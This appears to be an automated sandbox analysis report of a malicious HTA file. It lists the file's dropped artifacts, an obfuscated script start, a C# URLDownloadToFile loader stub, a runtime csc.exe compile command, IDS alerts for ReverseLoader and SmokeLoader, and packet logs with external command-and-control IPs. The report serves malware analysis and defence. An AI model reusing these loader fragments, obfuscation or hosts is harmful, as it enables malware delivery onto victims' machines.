                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                          Entropy (8bit):3.08598028436621
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHrGak7YnqqSrXPN5Dlq5J:+RI+ycuZhNsakSoPNnqX
                                                                                                                                                                                                                          MD5:F67654948167E4EEC62A2A539EB9A4FB
                                                                                                                                                                                                                          SHA1:DC0CB54798F696B0592EEBE6B710EE97FF065A33
                                                                                                                                                                                                                          SHA-256:ED79CA9EE9392E0512F3F89FF987CBC13644246757F2D7CFF7EEE5EFBCD2EEDA
                                                                                                                                                                                                                          SHA-512:86F5A974370280DC56A214F95A62BF834C226469F5FC264C93D4F7FD5239C0EA937CB34003BDCDECA3FD511D64B30B17D75DDFBD12C77759BB3F7E052C178259
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):472
                                                                                                                                                                                                                          Entropy (8bit):3.7725208644149166
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:V/DsYLDS81zuE40zmMm/nQXReKJ8SRHy4H+J4EEJ4rNgueIy:V/DTLDfuER5XfHCzETueIy
                                                                                                                                                                                                                          MD5:1A212B8A44924D84EEBA108F2409B5E8
                                                                                                                                                                                                                          SHA1:B19066FAB9C3329CD206958DACEE65A08607586B
                                                                                                                                                                                                                          SHA-256:977B687CCDCAEA25B4AFDD04DBAC19BF12B31AFAD4AE226D7B7E5ED5CABCF073
                                                                                                                                                                                                                          SHA-512:4D4BBADA1880CE68CEEAFF34A1D412350F715C0F5F741F7F47692549280DC92738881CE1FFF7BBCD472610A63D99DED94CA713CC859B330A07D13DF2313EA453
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace lxsBtSMPv.{. public class dzTk. {. [DllImport("UrlMON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dnHrLo,string jlWMht,string L,uint UDwRBXCS,IntPtr qEKvq);.. }..}.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):369
                                                                                                                                                                                                                          Entropy (8bit):5.229177665998413
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpRB9n0zxs7+AEszIwkn23fpRBnH:p37Lvkmb6KRfBRBF0WZEifBRBH
                                                                                                                                                                                                                          MD5:38CBF6328A801AC68F8165D7461836D5
                                                                                                                                                                                                                          SHA1:2267DCEE38613D84BAA3190980321034884063CC
                                                                                                                                                                                                                          SHA-256:F6E25D474D6DD0D75D2A284063BB4201873DF03A195F25A7EF5D87EF864A95C4
                                                                                                                                                                                                                          SHA-512:9915EF6382E8C8E40C5D118FD05E897FA34B871A27B231E8C45825D0523FD0ECFEAF94BE56E2A09A900B815C1B094D22B2AAE9F99AEC23F709EDF9F32038EB26
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.0.cs"
                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):3072
                                                                                                                                                                                                                          Entropy (8bit):2.8223730078480904
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:etGSYPBu5exl8sMQgkg4qvPStZwtkZf9ANjcUWI+ycuZhNsakSoPNnq:6nsx+FT4CPStZXJiNA31ulsa3Qq
                                                                                                                                                                                                                          MD5:EFAAD8992FA28BF3BAE7BBEA81A0D47C
                                                                                                                                                                                                                          SHA1:FED7AC0477E089C3EE1B42B1BD9086CCB8D85520
                                                                                                                                                                                                                          SHA-256:1642E0F75AAF02CA869425616EC18047F716A71B1D707AF6CE2B8D5E6A6F73F4
                                                                                                                                                                                                                          SHA-512:7BEE2E665D9DD82DCE9BFFC2829BF101C6FFF208F58164E647CB9F412C70856240B2D9B4ABF705916AEE739ED50B0CC9BFBC27746D839ACA5BE5618D43B5E0E6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y.;g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....t.....t.......................................... =.....P ......O.........U.....\.....c.....e.....n...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.tn
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):867
                                                                                                                                                                                                                          Entropy (8bit):5.316026316134132
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:KJBqd3ka6KRfnBzEifnBOKax5DqBVKVrdFAMBJTH:Cika6CVEuUK2DcVKdBJj
                                                                                                                                                                                                                          MD5:761D4E90E2F4CFC631CD04920570EA39
                                                                                                                                                                                                                          SHA1:1D8931A82481C0D43722C745C1C5CD5DCF6E2829
                                                                                                                                                                                                                          SHA-256:D6FA8F46C1FF92B69E7B358F89A5CADFF40C1FB4A15213160B70CA76001A11B6
                                                                                                                                                                                                                          SHA-512:A727F5DE5DC60BD90716B048A0A8A24E62D5132FAC3602720CA4D1403755288BE80416C36F969B1AF53D9B19A87C604A072A25798D0A6D2A19141A4FE86BCAD2
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):56368
                                                                                                                                                                                                                          Entropy (8bit):6.120994357619221
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                                                                                                                          MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                          SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                                                                                                                          SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                                                                                                                                          SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: invoice727282_PDF..exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 6038732).vbs, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):339146
                                                                                                                                                                                                                          Entropy (8bit):7.999480831786925
                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                          SSDEEP:6144:1Dgj/nmaDvMESsqjdh+jmLmtjYTbUD+OHbP2ZnGVrSTdgTOK0Zws:8/jAESsqjj+jntjHP2puSrLF
                                                                                                                                                                                                                          MD5:3D07318E14D6377E3ECD91C8BC6C59CC
                                                                                                                                                                                                                          SHA1:E4D7E990439FA1B9EE79B50607EE6ADA2DFFD25D
                                                                                                                                                                                                                          SHA-256:56EB8490E9F0B1A50F921E2F65F6AEA8F07B160055234EEF831210BD2BA27424
                                                                                                                                                                                                                          SHA-512:B275ACF731567C5D9B26C387AC4687D86311724F2C1B1A7AF3691B73122E3D2597455D5CAC99F8285FE9E44CD572014ECEF809A8523C1F6491FA625096B4DB73
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.g?}..8h..>...\.....,...1...f.%.....1Ri.o.....&.w.y.E.F..,....,..m7a3.i.~.y..Iy...T...k1...Q0.(p..#'...@.G.e.u@...4...u.s...k'...<..bZ.sD.-.&..W.71d..H.^9G.GP...s..v.#..T........V.2..{t...{....{q..a".A".(:.b...]..'R!gX."(.=....\.aj...`J../.Ks ..X.c.Ce...y.....v)..............:..).4.@E.uV.0!..m....."...L'...d ....[..l..?Y..K......u...D.91..'.g....M.........g...L.c...pEi...k.;._.%...".......E.....=...t.eB\C..K.*....9Gx.v.....j..x<.............c.9.... .@=*.=.h.$.eJ.{H.N.....j....w.I......'......i.......3E....A....o....:....>q..Os/P.z.uC.|`[......>...tG....X.AS.....IMwk..5|.....#...z.dq...}....oFC...Y......)R. ...'J.s.........SU.J..rD.~.N..V.".~.~.j.."U)`..T......c[.KS..K....<.2.m.............r...(.:.X.....7.V.#Z......|.....!.W/b....#.6%...H..e...n=41P.N."|..Z ..b.....?).1..WC......h........x..xx.....+...,Q.....K.N.._=...7`.oR...X+..`;_..On.Y..8...d......"..x.u......5hs....F..S..}.L..u..j..\.d.d.v..../.._...}.;7...u7.f....Ru....=?e.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):141308
                                                                                                                                                                                                                          Entropy (8bit):3.677460277464518
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
                                                                                                                                                                                                                          MD5:855D024750A1BC1BC078E60C05E506E3
                                                                                                                                                                                                                          SHA1:480C344EF4E060ADB7CA7E159C815CB38AC87614
                                                                                                                                                                                                                          SHA-256:560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
                                                                                                                                                                                                                          SHA-512:64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Preview:..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\djvbaae
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):221
                                                                                                                                                                                                                          Entropy (8bit):4.801526423190794
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
                                                                                                                                                                                                                          MD5:A3DCA41A950A7DF7ECE76A867A17400E
                                                                                                                                                                                                                          SHA1:AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
                                                                                                                                                                                                                          SHA-256:6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
                                                                                                                                                                                                                          SHA-512:F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...
                                                                                                                                                                                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Entropy (8bit):2.3478224513716413
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                            File name:bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                                                                                            File size:182'569 bytes
                                                                                                                                                                                                                            MD5:05dcffe1d8e8e209a90b522192ad8000
                                                                                                                                                                                                                            SHA1:77c19b392d39bce4906b5c4e5f1ab0a0c9182dc7
                                                                                                                                                                                                                            SHA256:35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5
                                                                                                                                                                                                                            SHA512:11eafd5f126bb4873ec7be1dc6fe7246f3de8324c413073bc914827695ed1db1bb9b6e870414c0d4aba990a6a817d6c029f7aa02e5061434dcdb965a378b5734
                                                                                                                                                                                                                            SSDEEP:48:4vahW5oZz7eWLB2ZfywyQhhY1ywyQbD6ngS5RJCS0d399Dd5nCYmIYZAjo3ueufc:4vCl17ZtQjtQhVFlfnnCO4AjovtQX5Q
                                                                                                                                                                                                                            TLSH:49047C96EA3448DABBCC4E63BDFC739E3AB8275F62C60E95931B3412DD5039C588052C
                                                                                                                                                                                                                            File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252
                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2024-11-18T18:37:18.758930+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730107.172.44.17880TCP
                                                                                                                                                                                                                            2024-11-18T18:37:26.824559+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.449731TCP
                                                                                                                                                                                                                            2024-11-18T18:38:09.197379+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978146.173.214.2480TCP
                                                                                                                                                                                                                            2024-11-18T18:38:09.370502+01002829848ETPRO MALWARE SmokeLoader encrypted module (3)246.173.214.2480192.168.2.449781TCP
                                                                                                                                                                                                                            2024-11-18T18:38:17.024024+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44981746.173.214.2480TCP
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.076105118 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.081103086 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.081231117 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.081362963 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.086378098 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758707047 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758750916 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758764029 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758919954 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758932114 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758929968 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758944035 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758975983 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758985043 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759097099 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759109974 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759120941 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759156942 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759185076 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759394884 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.761344910 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.763900042 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.763947010 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.763959885 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.763981104 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.764003992 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.764084101 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.764126062 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.878995895 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879034996 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879050970 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879074097 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879116058 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879230022 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879245043 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879303932 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879337072 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879379034 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879414082 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879427910 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879462004 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879703045 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879734993 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879759073 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879781961 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879796028 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879817009 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879849911 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879964113 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.879976034 CET8049730107.172.44.178192.168.2.4
